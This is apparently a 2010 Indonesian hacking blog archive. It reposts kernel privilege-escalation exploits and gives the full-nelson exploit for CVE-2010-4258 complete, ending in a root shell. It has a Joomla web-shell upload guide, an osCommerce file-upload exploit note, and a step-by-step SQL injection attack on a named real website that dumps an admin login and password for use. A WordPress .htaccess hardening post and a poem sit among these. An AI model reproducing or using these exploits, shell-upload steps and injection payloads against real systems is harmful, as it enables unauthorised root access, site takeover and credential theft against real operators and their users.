Tuesday 28 December 2010

Linux Kernel 2.6.36 Kernel Memory Disclosure

/*
* cve-2010-3437.c
*
* Linux Kernel <>
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* https://bugzilla.redhat.com/show_bug.cgi?id=638085
*
* The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a
* pktcdvd_device from the global pkt_devs array. The index into this
* array is provided directly by the user and is a signed integer, so the
* comparison to ensure that it falls within the bounds of this array will
* fail when provided with a negative index.
*
* Usage:
*
* $ gcc cve-2010-3437.c -o cve-2010-3437
* $ ./cve-2010-3437
* usage: ./cve-2010-3437
* $ ./cve-2010-3437 0xc0102290 64
* [+] searching for pkt_devs kernel symbol...
* [+] found pkt_devs at 0xc086fcc0
* [+] opening pktcdvd device...
* [+] calculated dereference address of 0x790070c0
* [+] mapping page at 0x79007000 for pktcdvd_device dereference...
* [+] setting up fake pktcdvd_device structure...
* [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...
* [+] dumping kmem to output...
*
* 55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...
* 55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...
*
* Notes:
*
* Pass the desired kernel memory address and dump length as arguments.
*
* We can disclose 4 bytes of arbitrary kernel memory per ioctl call by
* specifying a large negative device index, causing the kernel to
* dereference to our fake pktcdvd_device structure in userspace and copy
* data to userspace from an attacker-controlled address. Since only 4
* bytes of kmem are disclosed per ioctl call, large dump sizes may take a
* few seconds.
*
* Tested on Ubuntu Lucid 10.04. 32-bit only for now.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

Download Full

Monday 27 December 2010

Linux RDS Protocol Local Privilege Escalation

/*
* Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
* CVE-2010-3904
* by Dan Rosenberg
*
* Copyright 2010 Virtual Security Research, LLC
*
* The handling functions for sending and receiving RDS messages
* use unchecked __copy_*_user_inatomic functions without any
* access checks on user-provided pointers. As a result, by
* passing a kernel address as an iovec base address in recvmsg-style
* calls, a local user can overwrite arbitrary kernel memory, which
* can easily be used to escalate privileges to root. Alternatively,
* an arbitrary kernel read can be performed via sendmsg calls.
*
* This exploit is simple - it resolves a few kernel symbols,
* sets the security_ops to the default structure, then overwrites
* a function pointer (ptrace_traceme) in that structure to point
* to the payload. After triggering the payload, the original
* value is restored. Hard-coding the offset of this function
* pointer is a bit inelegant, but I wanted to keep it simple and
* architecture-independent (i.e. no inline assembly).
*
* The vulnerability is yet another example of why you shouldn't
* allow loading of random packet families unless you actually
* need them.
*
* Greets to spender, kees, taviso, hawkes, team lollerskaters,
* joberheide, bla, sts, and VSR
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)

Download Full


Sunday 26 December 2010

Easy Upload Shell in Joomla

Ada simple trik untuk mengupload shell di cms joomla, mungkin udah banyak yang tahu tentang ini. Sebenarnya memakai aplikasi kayak ninja explorer juga bisa sih, tapi kalau koneksi kita lemot kan agak lumayan merepotkan ,atau kalau gak si admin setting biar tidak ada aplikasi yang boleh di install, nah ini caranya gan, lebih praktis juga loh. Langsung aja lah..

Persiapan pertama sudah ada site joomla yang jadi target, sama siapkan shell/ injector. Kalau semua sudah beres langsung saja kita praktekkan.
jangan lupa kopi + rokok, biar lancar awkakwkakwkawk

1. Kalau sudah masuk di cmsnya kan ada tuh menu-menu atau kotak-kotak dibagian tengah, atau klik site > pilih Global Configuration, kalau udah Pilih System, lihat gambar dibawah ini.

2. Pada bagian Media Settings, Legal Extensions (File Types) kita harus merubah salah satu ekstensi disitu contoh yang bisa kita rubah adalah ODP atau ODG ada juga JPG. Rubahlah jadi PHP, kalau sudah liaht pada bagian Restrict Uploads dan Check MIME Types, kalau default itu di centang ke YES, nah kita rubah lah jadi NO.
Perhatiin pada bagian Legal MIME Types nah pada bagian disitu kan banyak tuh tulisan kayak image/jpeg,image/gif,image dll lah, pilih pada bagian belakang klo gak salah X-ZIP atau yang mana aja terserah pokoknya rubah jadi PHP. Kalau sudah di save then NEXT STEP.

3. Pada langkah nomor 2 kalau berahasil ada tulisan “The Global Configuration details have been updated.” klo gagal “An Error has occurred! Unable to open configuration.php file to write!”.Kalau ternyata gagal, anda bisa melakukan cara lain dengan mengganti source index.php templates dengan source injector kamu.
disini kita ngomongin yang berhasil, kalau berahasil pilih MEDIA MANAGER. Perhatikan pada bagian bawah, Upload file injector atau shell anda. misalkan : shell.php
kalau sukses, hasilnya seperti screen shoot dibawah ini..

4. Selanjutnya pemanggilan URL shell nya seperti ini: http://[localhost]/images/shell.php

Mudah kan,gagaga...selamat menikmati hasil kejahatan anda..
Just share buat newbie,yang udah mastah dilarang keras baca ini artikel..!!

Protect WordPress Directory with .Htaccess

Kembali lagi ma ane gan, kali ini kita membahas soal keamanan wordpress,kita membahas salah satu keamanan seperti judul di atas, dengan file .htaccess. Mungkin banyak yang sudah tahu atau yang sudah membahas tentang ini,tapi tidak ada salahnya jika mau dishare lagi.. :D

Mari kita bahas tentang file .htaccess,apa itu .htacess..? file .htaccess adalah file teks ASCII yang terletak di dalam root direktori biasanya “public_html” atau klo hosting free di “htdocsyang sering digunakan untuk mengubah pengaturan default dari web server yang digunakan. Sehingga manfaat dari file .htaccess ini besar sekali. Dan merupakan Web Utility yang sering digunakan oleh para web master.
lalu apa saja yang harus di amankan di wordpress.?bnyak gan,conthnya /wp-admin,/wp-includes,wp-login.php,wp-db.php,wp-config.php ./etc..
langsung aja gan, source code yang nanti ane kasih agan tinggal copy lalu paste aja di .htaccess,udah tahu kali.. :D

Akses halaman /Wp-Admin Login dengan Private IP/Single IP

AuthUserFile /dev/null

AuthGroupFile /dev/null

AuthName “Access Control”

AuthType Basic

order deny,allow

deny from all

# IP address sobat

allow from **.***.***.**

Coba perhatikan sama huruf yang berwarna merah itu gan, **.***.***.** rubah sama IP agan,jadi khusus satu IP aja yang bisa akses halaman itu.. :D
Terus gimana dengan wp-login.php itu juga sama kan buat login..? Hmm tenang gan, kita lanjut ke wp-login.php, pake private IP juga.. :D

Order deny,allow

Deny from All

Allow from **.***.***.**

sama seperti diatas, ganti tulisan yang berwarna merah pake IP agan, kalau buat yang IP nya dinamis mending tidak usah, coz itu cuma buat satu IP doanq,

Amankan Wp-Config.php

Lanjut gan,sekarang kita mw amanin file wp-config.php,dh tahu kan wp-config.php itu kegunaanya,maka dari itu mari kita amankan.. :D
nih codenya..

# protect wpconfig.php

order allow,deny

deny from all

Selajutnya kita bahas kebagian direktori Wp-includes,nah klo kata orang-orang sih di dalem direktori wp-includes itu ada wp-db.php yang bisa ngebongkar semua data penting kita gan,
buat jaga-jaga wp-includes dari serangan yang gk berwenang buat file index.php atau index.html di direktori itu gan. Untuk wp-db.php coba agan akses, adanya di wp-includes/wp-db.php pasti terjadi error gitu kan, klo emang disitu kelemahanya marilah kita tutupi, caranya buat file .htaccess dibagian di rektori wp-includes, terus isi sama code ini..


RewriteEngine On
RewriteBase /
RewriteRule .*\.php$ readme.html [L]

Perhatikan sama tulisan yang berwarna merah itu, itu file readme dari wordpress, nah kita coba mengalihkan file wp-db.php ke file readme.html dengan cara di atas.

Ok selesai,semoga bermanfaat dan berguna.. :D

Monday 20 December 2010

Linux Kernel 2.6.37 Local Privilege Escalation

/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -------------
* This is a NULL pointer dereference in the Econet protocol. By itself, it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -------------
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
* * The particular symbols I resolve are not exported on Slackware or Debian
* * Red Hat does not support Econet by default
* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
* Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*/

Download Full

Sunday 19 December 2010

Oscommerce Online Merchant v2.2

Recode by arianom

[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date : 30-05-2010
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Remote File Upload
[$] Vendor : http://www.oscommerce.com
[$] Google Dork : n/a
[%] vulnerable file: /admin/file_manager.php
[$] Exploit: Download

Note:
Open and edit script,
Change http://kill-9.org with your website target.
Then upload to shell or hosting. Run it and Resolve to the Target.
Good Luck,,Bro

Greats : All Kill-9 Crew and IndonesianCoder Team , Malang-Cyber Crew and You

Just in Memorian

Tutina Fitri
malang, juli '03


Dear...Kadang kita berharap
Tuhan akan menunjuk jalan kita
dan membuka sedikit tabir rahasianya.
Seperti matahari yang terbit di timur dan terbenam di barat
atau seperti waktu yang tidak pernah berhenti,
perasaanku akan selalu dekat denganmu
Sepi bicara,
betapa sempitnya waktu, betapa terasa besarnya cinta,
jikapun aku percaya ada hidup setelah mati, kita tidak akan pernah bertemu lagi.
Dear...Kita selalu mencoba untuk menghargai hidup agar lebih berarti,
meskipun kecil tapi embun adalah pertanda datangnya musim semi.
Suara burung atau bunyi yang indah adalah bukan pilihan,
keduanya akan selalu ingin kita nikmati.
Jika aku harus memilih aku tidak akan memilih
karna angin akan selalu membawa legenda cerita kita
yang akan selalu berakhir bahagia.
Hanya waktu yang bisa merenggutmu dariku..


sumbersari gang 5/503

Saturday 18 December 2010

Linux Kernel CAP_SYS_ADMIN

/*
* Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)
* by Joe Sylve
* @jtsylve on twitter
*
* Released: Jan 7, 2011
*
* Based on the bug found by Dan Rosenberg (@djrbliss)
* only loosly based on his exploit http://www.exploit-db.com/exploits/15916/
*
* Usage:
* gcc -w caps-to-root2.c -o caps-to-root2
* sudo setcap cap_sys_admin+ep caps-to-root2
* ./caps-to-root2
*
* Kernel Version >= 2.6.34 (untested on earlier versions)
*
* Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit
*
* This exploit takes advantage of the same underflow as the original,
* but takes a different approach. Instead of underflowing into userspace
* (which doesn't work on 64-bit systems and is a lot of work), I underflow
* to some static values inside of the kernel which are referenced as pointers
* to userspace. This method is pretty simple and seems to be reliable.
*/
#include
#include
#include
#include
#include
#include
// Skeleton Structures of the Kernel Structures we're going to spoof
struct proto_ops_skel {
int family;
void *buffer1[8];
int (*ioctl)(void *, int, long);
void *buffer2[12];
};
struct phonet_protocol_skel {
void *ops;
void *prot;
int sock_type;
};

Download Full

Friday 17 December 2010

Local Solaris Kernel Exploit

/***********************************************************
* hoagie_solaris_siocgtunparam.c
* LOCAL SOLARIS KERNEL ROOT EXPLOIT (<>
*
* Bug reported by Tobias Klein
* http://www.trapkit.de/advisories/TKADV2008-015.txt
* Exploit by: peri.carding (http://www.void.at/main/)
*
* $ ./hoagie_solaris_siocgtunparam
* hoagie_solaris_siocgtunparam.c - solaris root < <>
* -andi / void.at
*
* [*] socket created
* [*] mapping zero page successful
* [*] process cred address: 0xd3853894
* [*] prepare null page
* [*] clean up write queue
* # uname -a
* SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc
* # id
* uid=0(root) gid=0(root)
* #
*
* First of all we have to make sure that ip_extract_tunreq() will
* return 0 and ipifp is still set to NULL. This can be achieved by
* using an interface alias starting with zero. (the interface ip.tun0
* must not exist because ipif_lookup_on_name() will "fail" to get
* null page)
*
* ip_if.c / ipif_lookup_on_name()
* ...
* if (&cp[2] <>
* return (NULL);
* ...
*
* In ip_sioctl_tunparam() ipif->ipif_ill is used for mutex enter
* so we have to set the offet for an ill_t structure. Later putnext()
* will be called with a queue (see ill_t). We can use this queue to
* add a custom callback function that is used by putnext().
*
* ip_if.c / ip_sioctl_tunparam():
* ...
* ill = ipif->ipif_ill;
* mutex_enter(&connp->conn_lock);
* mutex_enter(&ill->ill_lock);
* ...
* if (success) {
* ip1dbg(("sending down tunparam request "));
* putnext(ill->ill_wq, mp1);
* return (EINPROGRESS);

Download Full

Tuesday 14 December 2010

Manual SQL Injection Tutorial

Manual SQL Injection Tutorial

By : arianom Kill-9 Crew


Target : http://www.natoleo.com/Content.php?id=14

1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com

http://www.natoleo.com/Content.php?id=14

muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)


2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')

http://www.natoleo.com/Content.php?id=14 order by 5--

jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)


3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14

http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--

akan muncul "angka ajaib" : 1


4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.

http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--

muncul tulisan :5.0.51a-community


5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--

muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome


6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273

tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--

muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id

kita ambil : member_login,member_password


7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL

ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--

hasilnya akan muncul:

user: wilmarnatoleo

pass: natoleoP@ssword

sekarang tinggal login ke website target..

http://www.natoleo.com/admin/

Say No to Malingsial. Semoga berhasil kawan..

Sunday 12 December 2010

Linux Kernel 2.6.27 compat exploit

/*
Ac1dB1tch3z Vs Linux Kernel x86_64 0day
Today is a sad day..
R.I.P.
Tue, 29 Apr 2008 / Tue, 7 Sep 2010
a bit of history:
MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one)
author David L Stevens
Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
committer David S. Miller
Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
This patch adds support for getsockopt for MCAST_MSFILTER for
both IPv4 and IPv6. It depends on the previous setsockopt patch,
and uses the same method.
Signed-off-by: David L Stevens
Signed-off-by: YOSHIFUJI Hideaki
Signed-off-by: David S. Miller
------------------------------------------------------------
Thank you for signing-off on this one guys.
This exploit has been tested very thoroughly
over the course of the past few years on many many targets.
Thanks to redhat for being nice enough to backport it into early
kernel versions (anything from later August 2008+)
Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the
plan8 man. Just a bit too l8.
PS:
OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right ;))
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

Download Full

Thursday 9 December 2010

Linux Kernel <= 2.6.37 Local Privilege Escalation

/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -------------
* This is a NULL pointer dereference in the Econet protocol. By itself, it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -------------
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
* * The particular symbols I resolve are not exported on Slackware or Debian
* * Red Hat does not support Econet by default
* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
* Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* How many bytes should we clear in our
* function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" :
"");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
/* Why do I do this? Because on x86-64, the address of
* commit_creds and prepare_kernel_cred are loaded relative
* to rip, which means I can't just copy the above payload
* into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{
#ifdef __x86_64__
asm("mov $getroot, %rax; call *%rax;");
#else
asm("mov $getroot, %eax; call *%eax;");
#endif
}
/* Triggers a NULL pointer dereference in econet_sendmsg
* via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
int ret;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
if(ret <>
printf("[*] Failed to set Econet address.\n");
return -1;
}
splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
/* Shouldn't get here... */
exit(0);
}
int main(int argc, char * argv[])
{
unsigned long econet_ops, econet_ioctl, target, landing;
int fildes[4], pid;
void * newstack, * payload;
/* Create file descriptors now so there are two
references to them after cloning...otherwise
the child will never return because it
deadlocks when trying to unlock various
mutexes after OOPSing */
pipe(fildes);
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);
if(fildes[0] <>
printf("[*] Failed to open file descriptors.\n");
return -1;
}
/* Resolve addresses of relevant symbols */
printf("[*] Resolving kernel addresses...\n");
econet_ioctl = get_kernel_sym("econet_ioctl");
econet_ops = get_kernel_sym("econet_ops");
commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
printf("[*] Failed to resolve kernel symbols.\n");
return -1;
}
if(!(newstack = malloc(65536))) {
printf("[*] Failed to allocate memory.\n");
return -1;
}
printf("[*] Calculating target...\n");
target = econet_ops + 10 * sizeof(void *) - OFFSET;
/* Clear the higher bits */
landing = econet_ioctl <<>> SHIFT;
payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if ((long)payload == -1) {
printf("[*] Failed to mmap() at target address.\n");
return -1;
}
memcpy((void *)landing, &trampoline, 1024);
clone((int (*)(void *))trigger,
(void *)((unsigned long)newstack + 65536),
CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
&fildes, NULL, NULL, target);
sleep(1);
printf("[*] Triggering payload...\n");
ioctl(fildes[2], 0, NULL);
if(getuid()) {
printf("[*] Exploit failed to get root.\n");
return -1;
}
printf("[*] Got root!\n");
execl("/bin/sh", "/bin/sh", NULL);
}